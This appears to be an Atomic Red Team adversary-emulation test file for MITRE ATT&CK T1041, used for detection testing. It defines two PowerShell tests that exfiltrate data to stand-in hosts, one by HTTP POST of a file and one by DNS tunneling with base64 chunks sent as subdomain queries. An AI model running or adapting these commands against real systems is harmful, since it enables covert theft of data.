attack_technique: T1041 display_name: 'Exfiltration Over C2 Channel' atomic_tests: - name: C2 Data Exfiltration auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: | Exfiltrates a file present on the victim machine to the C2 server. supported_platforms: - windows input_arguments: destination_url: description: Destination URL to post encoded data. type: string default: example.com filepath: description: The file which is being exfiltrated to the C2 Server. type: path default: $env:TEMP\LineNumbers.txt executor: command: | if(-not (Test-Path #{filepath})){ 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } } [System.Net.ServicePointManager]::Expect100Continue = $false $filecontent = Get-Content -Path #{filepath} Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive name: powershell - name: Text Based Data Exfiltration using DNS subdomains auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9 description: | Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel. supported_platforms: - windows input_arguments: dns_server: description: DNS server IP address or domain name. type: url default: dns.example.com exfiltrated_data: description: Data to be exfiltrated. type: string default: SecretDataToExfiltrate chunk_size: description: Size of each DNS query chunk (in characters). type: integer default: 63 executor: command: | $dnsServer = "#{dns_server}" $exfiltratedData = "#{exfiltrated_data}" $chunkSize = #{chunk_size} $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData) $encodedData = [Convert]::ToBase64String($encodedData) $chunks = $encodedData -split "(.{$chunkSize})" foreach ($chunk in $chunks) { $dnsQuery = $chunk + "." + $dnsServer Resolve-DnsName -Name $dnsQuery Start-Sleep -Seconds 5 } name: powershell